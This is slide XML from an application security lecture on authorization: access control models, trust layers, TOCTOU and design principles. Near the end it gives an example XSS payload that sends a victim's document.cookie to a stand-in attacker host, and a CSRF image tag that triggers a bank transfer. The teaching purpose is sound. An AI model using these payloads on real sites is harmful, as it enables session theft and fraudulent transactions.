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68" r:id="rId2"/>
    <p:sldId id="269" r:id="rId3"/>
    <p:sldId id="260" r:id="rId4"/>
    <p:sldId id="332" r:id="rId5"/>
    <p:sldId id="357" r:id="rId6"/>
    <p:sldId id="360" r:id="rId7"/>
    <p:sldId id="358" r:id="rId8"/>
    <p:sldId id="359" r:id="rId9"/>
    <p:sldId id="361" r:id="rId10"/>
    <p:sldId id="363" r:id="rId11"/>
    <p:sldId id="364" r:id="rId12"/>
    <p:sldId id="365" r:id="rId13"/>
    <p:sldId id="366" r:id="rId14"/>
    <p:sldId id="368" r:id="rId15"/>
    <p:sldId id="367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62" r:id="rId44"/>
    <p:sldId id="396" r:id="rId45"/>
    <p:sldId id="397" r:id="rId46"/>
    <p:sldId id="398" r:id="rId47"/>
    <p:sldId id="399" r:id="rId48"/>
    <p:sldId id="400" r:id="rId49"/>
    <p:sldId id="401" r:id="rId50"/>
    <p:sldId id="402" r:id="rId51"/>
    <p:sldId id="403" r:id="rId52"/>
    <p:sldId id="404" r:id="rId53"/>
    <p:sldId id="405" r:id="rId54"/>
    <p:sldId id="406" r:id="rId55"/>
    <p:sldId id="270" r:id="rId56"/>
    <p:sldId id="265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00"/>
    <a:srgbClr val="FF00FF"/>
    <a:srgbClr val="E6E6E6"/>
    <a:srgbClr val="E0E0E0"/>
    <a:srgbClr val="133C5D"/>
    <a:srgbClr val="131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66F15-64CE-44F6-AF51-8F568C022106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05D92-3DF3-46AE-AA3E-E4F00EDC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343F-1CE6-4DBC-81D0-0B6C4F0D4CEA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9297-094B-4D43-A2BC-251F70F7FAC6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1244-2662-4920-9F2A-89027007E985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F28C-CA03-417A-BB11-4581E88297A7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8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E42-88DE-4DAE-BEE6-F990EFC56C39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1E9-EBCB-4F75-92F3-F2DCBCACB9FA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2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1"/>
            <a:ext cx="4041775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2E2A-7803-4D06-A8B8-49F1F33489B9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5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B316-30AA-4DF3-9FF0-A99B6D420566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DD29-E6DC-41B0-9328-87E0347E6B3D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0766-FF88-4569-AE43-2DC25C757AC3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0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5A12-29E9-4A8B-BF11-BE0A3FC00240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64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D201-9091-4BC7-8645-E6644BE2C723}" type="datetime1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6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ISEC 400 Application Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Week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Copyright © 2013 Todd Whittaker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(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todd.whittaker@franklin.edu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64" y="1981200"/>
            <a:ext cx="6985000" cy="2768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336268"/>
            <a:ext cx="354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94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14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of authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Users can perform actions only within their privilege level.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Resources are protected using criteria based on roles or privilege level.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mitigate privilege escalation attacks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96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Authorization process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Subjects: anything “named.”  Browser is actually a the subject, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>proxying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for the user running it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Objects (aka resources)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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Functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usually named as well by a URL using REST (i.e. www.site.cxx/users/view/194317)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read, write, execute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6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Permission systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ACLs are most common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Per user or per role permissions kept with the object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Discretionary access control (DAC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mandatory access control (MAC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Role-based access control (RBAC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hybrid: usually a mix of RBAC and DAC because MAC doesn’t mix.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3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permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usually seen as two types of systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read, write, execute: allow access to read data, write data, or execute some function on the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Create, read, update, delete: CRUD access to various pieces of data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3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permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usually seen as two types of systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read, write, execute: allow access to read data, write data, or execute some function on the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Create, read, update, delete: CRUD access to various pieces of data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667000" y="4308764"/>
            <a:ext cx="5791200" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -2830"/>
              <a:gd name="adj2" fmla="val -9948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CRUD is really just more carefully defining what “execute” means.  In MVC applications, you’re protecting controllers that carry out actions, so it’s all “execute.”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79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14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3733800" y="2209800"/>
            <a:ext cx="4038600" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87143"/>
              <a:gd name="adj2" fmla="val 1379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Vertical: accessing something at the top requires permissions from lower layers.  In threat modeling these layers would be trust boundaries.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84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2190173" y="4267200"/>
            <a:ext cx="4800600" cy="1806286"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -2552"/>
              <a:gd name="adj2" fmla="val -13536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Horizontal: accessing something to the right requires permission from something to the left.  Again, these are trust boundaries.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31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14600" y="5372100"/>
            <a:ext cx="4800600" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -47958"/>
              <a:gd name="adj2" fmla="val -8757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Each of these layers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(horizontal and vertical) represents a chance to practice defense-in-depth.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4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week’s expected outcomes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This week’s topics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This week’s homework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upcoming deadlines</a:t>
            </a:r>
          </a:p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47CB-F391-4DAB-9FB4-A73A580B607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429000" y="1219200"/>
            <a:ext cx="4800600" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -74701"/>
              <a:gd name="adj2" fmla="val 9939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portion of the system is completely outside our control and therefore utterly untrustworthy.  Code for UX, not security here.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81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257800" y="1447800"/>
            <a:ext cx="3429000" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -95712"/>
              <a:gd name="adj2" fmla="val -1401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Serves static resources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IP blacklist/whitelist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Port filtering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Running as unprivileged user and restricting file access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Secure configuration of services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70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04800" y="1780308"/>
            <a:ext cx="4191000" cy="3325092"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 68388"/>
              <a:gd name="adj2" fmla="val -3364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Serves dynamic resources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App compartmentalization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Frameworks, plugins, or custom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> services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Session state management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Load balancing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Majority</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authz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at user/group level.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30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Layers: horizontal and vertical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828800"/>
            <a:ext cx="6985000" cy="3771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102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057400" y="2052204"/>
            <a:ext cx="3733800" cy="4119996"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 88838"/>
              <a:gd name="adj2" fmla="val -3880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Handles queries, updates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Separate per-user authorization for DB, table, row, or column. Bare minimum permissions (e.g. no drops or schema changes)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Stored procedures can limit attack surface.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3380499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note on database security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Continuum of possibilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One DB user per application user. Allows fine grained control in high security applications; very difficult to manage and prove correct.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One DB user for everything.  Let the middleware or application handle restricting access to controllers that update the DB. Subject to escalation via injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hybrid. One DB user per major role. All of the cons and few of the pros of any of the above!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70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note on database security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Continuum of possibilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One DB user per application user. Allows fine grained control in high security applications; very difficult to manage and prove correct. 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One DB user for everything</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.  Let the middleware or application handle restricting access to controllers that update the DB. Subject to escalation via injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hybrid. One DB user per major role. All of the cons and few of the pros of any of the above!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819400" y="563706"/>
            <a:ext cx="4724400" cy="2179494"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -33156"/>
              <a:gd name="adj2" fmla="val 9002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By far the most common approach (due to DB vendors licensing per DB user).  Only 2 “users” in the DB: the admin and the “everyone else” account.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41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authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3x3 model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“What” dimension:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Subjects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“When” dimension:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Before loading interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Before requests are submitted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Before granting final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14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authorization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6540500" cy="4043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117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333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authorization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6540500" cy="4043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117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581400" y="3200400"/>
            <a:ext cx="4724400" cy="2671618"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -77731"/>
              <a:gd name="adj2" fmla="val -5412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Usually at the web server level, can the user even visit the page?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Inside firewall only services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Trusted business partner IPs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Also only displaying actions on the page that the user can perform.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1953167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authorization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6540500" cy="4043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117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3581400" y="3200400"/>
            <a:ext cx="4724400" cy="2671618"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -77731"/>
              <a:gd name="adj2" fmla="val -5412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Usually at the web server level, can the user even visit the page?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Inside firewall only services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Trusted business partner IPs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Also only displaying actions on the page that the user can perform.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="http://2.bp.blogspot.com/-QhFmOq799CM/Te30M8wgHSI/AAAAAAAAATA/yVfvRD2OzVA/s1600/401.unauthorized+err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5909"/>
            <a:ext cx="5000623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60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Contrast DAC, MAC, RBAC and hybrid approaches to access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Critique authorization controls and layers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examine common attacks against authorization controls.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authorization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6540500" cy="4043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117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36800" y="2286000"/>
            <a:ext cx="3578000" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 88955"/>
              <a:gd name="adj2" fmla="val -4015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Happens completely client-side and is untrustworthy (i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript form validation)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.  Only do this for UX reasons.  Helps honest people with honest browsers from making honest mistakes.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3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authorization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6540500" cy="4043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336268"/>
            <a:ext cx="3664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Sullivan and Liu, 2012, p. 117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57200" y="2743200"/>
            <a:ext cx="3578000" cy="2895600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 82243"/>
              <a:gd name="adj2" fmla="val 24158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Happens on the server.  This is where the URL is checked against logged in user permissions for that resource.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>most</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of authorization.  Warning: TOCTOU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2085220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TOCTOU: time of check to time of use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Authorization check should be made as close in time to the operation as possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problems:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Remember me” in public access computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Permission changes (i.e. revocation of privilege) mid-session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Solutions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Invalidate sessions that are idle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Invalidate sessions on permission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467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TOCTOU: time of check to time of use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Authorization check should be made as close in time to the operation as possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problems:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Remember me” in public access computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Permission changes (i.e. revocation of privilege) mid-session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Solutions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Invalidate sessions that are idle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Invalidate sessions on permission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267200" y="2286000"/>
            <a:ext cx="3578000" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -77806"/>
              <a:gd name="adj2" fmla="val 7495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These are really all session management issues.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6065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Fail closed (fail safe): exceptions in code should do the safe thing (e.g. invalidate session, redirect to login page)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Least privilege: servers run as restricted users, DB permissions for users are minimal, file systems on servers restrict access to application subdirectories, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Separating duties: admin accounts can’t do user-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> things and vice versa.  Two logins, if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91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Unique accounts: no sharing of identity between users (thwarts non-repudiation). Use roles if permissions are shared.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every request is authorized: not by username and password, but by session ID token.  Every URL should run through a permission check.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Centralized authorization: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>no copy-and-paste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>authz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> code in controllers. Extract to a separate library and invoke.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84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Unique accounts: no sharing of identity between users (thwarts non-repudiation). Use roles if permissions are shared.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every request is authorized: not by username and password, but by session ID token.  Every URL should run through a permission check.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Centralized authorization: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>no copy-and-paste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>authz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> code in controllers. Extract to a separate library and invoke.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572000" y="3352800"/>
            <a:ext cx="3124200" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -77806"/>
              <a:gd name="adj2" fmla="val 7495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Better: use someone else’s proven module.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827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Static resource protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No directory indexes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No guessable filenames or directory structures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No content stored in application directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No part of the path constructed from user-supplied data (preventing injection of “../../” in names).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User permissions at the OS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719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Authorization token protection: should be opaque, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unguessable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, or encrypted.  More on sessions later.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706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Attacks against authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Forceful browsing: changing URLs, cookies, form field contents, verbs (GET/POST), etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP header manipulation: mostly ignored because of tampering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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, authorization, and accounting make up the “AAA” services in security.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Definition: “the process of determining whether a subject has sufficient permission to perform a given operation against a target resource,” (Sullivan &amp; Liu, p. 93).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00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Attacks against authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS (cross site scripting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JS embedded by an attacker in your web pages can expose anything your server puts in the browser.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352800"/>
            <a:ext cx="8153400" cy="13716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script&gt;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document.write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("&lt;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src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='http://attackersite/cookie.php?x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="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+ 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escape(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document.cookie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+ "'&gt;");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&lt;/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script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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403600" y="4876800"/>
            <a:ext cx="5029200" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -46217"/>
              <a:gd name="adj2" fmla="val -8397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Now the attacker can masquerade as one of your users, bypassing all authorization!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992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Attacks against authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF (cross site request forgery)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML embedded by an attacker in your web pages, lengthy sessions, and no reauthorization can expose your users to being robbed.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0"/>
            <a:ext cx="8153400" cy="457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src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='http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://your.bank.com/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transfer.php?amt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=50&amp;to=31337'&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
